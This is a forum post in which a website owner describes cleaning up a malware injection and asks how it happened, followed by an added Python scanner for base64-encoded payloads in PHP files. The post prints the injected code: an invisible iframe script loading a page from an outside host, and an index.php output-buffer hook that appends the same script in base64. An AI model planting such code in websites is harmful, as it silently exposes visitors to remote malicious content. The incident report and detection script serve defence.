[eluser]CocoMansur[/eluser]
Recently I encountered malware: a script was injected into our website.
Code:
[removed][removed]('<style>.vb_style_forum {filter:
alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div
class="vb_style_forum"><iframe height="150" width="200"
src="http://vidintex.com/includes/class.pop.php"></iframe></div>');[removed]
Bad for me, I wasn't able to have a clean backup of our whole website. So what I did was download all the files in public_html/, then scan them with Kaspersky AV; threats were detected and cleaned. I also did a string search for the script and found 3 .js files that had that script, and deleted them as well. I scanned again with an AV and it's now clean.
I uploaded all the files to the web server and everything seemed fine, but then I noticed there is a gap at the bottom of the page. I checked the source code and found out that a script was still appended at the bottom of the page, after the </html> tag.
I did a string search of the files again, but the script was not found. Then I did a manual search and noticed index.php has injected code:
Code:
ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vdmlkaW50ZXguY29tL2luY2x1ZGVzL2NsYXNzLnBvcC5waHAiPjwvaWZyYW1lPjwvZGl2PicpOzwvc2NyaXB0Pg==');}
I deleted the code and the appended script on the page is now gone. Any ideas how they managed to inject that code?
Anyway, I also posted this in case someone might have this same problem in the future.
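Added example, not part of the original post: the second string search found nothing because the payload in index.php was stored base64-encoded, so a scan has to decode `base64_decode()` literals before matching. The Python sketch below does that; the marker list, function names and the sample PHP are constructed for illustration.

```python
import base64
import binascii
import re
from pathlib import Path

# String literals passed directly to base64_decode(), single or double quoted.
B64_CALL = re.compile(r"""base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")
# Substrings worth flagging once a literal is decoded (assumed list, extend as needed).
MARKERS = ("<iframe", "<script", "document.write", "eval(")

def scan_php_source(source):
    """Return [(line_no, decoded_text, markers_hit)] for suspicious literals."""
    findings = []
    for m in B64_CALL.finditer(source):
        try:
            decoded = base64.b64decode(m.group(2))
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to inspect
        text = decoded.decode("utf-8", errors="replace")
        hits = [k for k in MARKERS if k in text.lower()]
        if hits:
            line_no = source.count("\n", 0, m.start()) + 1
            findings.append((line_no, text, hits))
    return findings

def scan_tree(root):
    """Scan every .php file under root; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php_source(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report

# Constructed sample (not the payload from the post): same shape as the
# injected index.php line, pointing at a placeholder host.
PLAIN = "<script>document.write('<iframe src=\"http://example.invalid/x.php\"></iframe>');</script>"
SAMPLE_PHP = (
    "<?php\n"
    "$greeting = base64_decode('aGVsbG8gd29ybGQ=');\n"  # benign: "hello world"
    'ob_start("cb"); function cb($b){return $b.base64_decode(\''
    + base64.b64encode(PLAIN.encode()).decode()
    + "');}\n"
)

if __name__ == "__main__":
    for line_no, text, hits in scan_php_source(SAMPLE_PHP):
        print(f"line {line_no}: {hits} -> {text}")
```

Running `scan_tree()` against a downloaded copy of public_html/ lists each PHP file whose decoded literals contain markup or script, which a plain-text search for the visible script cannot find.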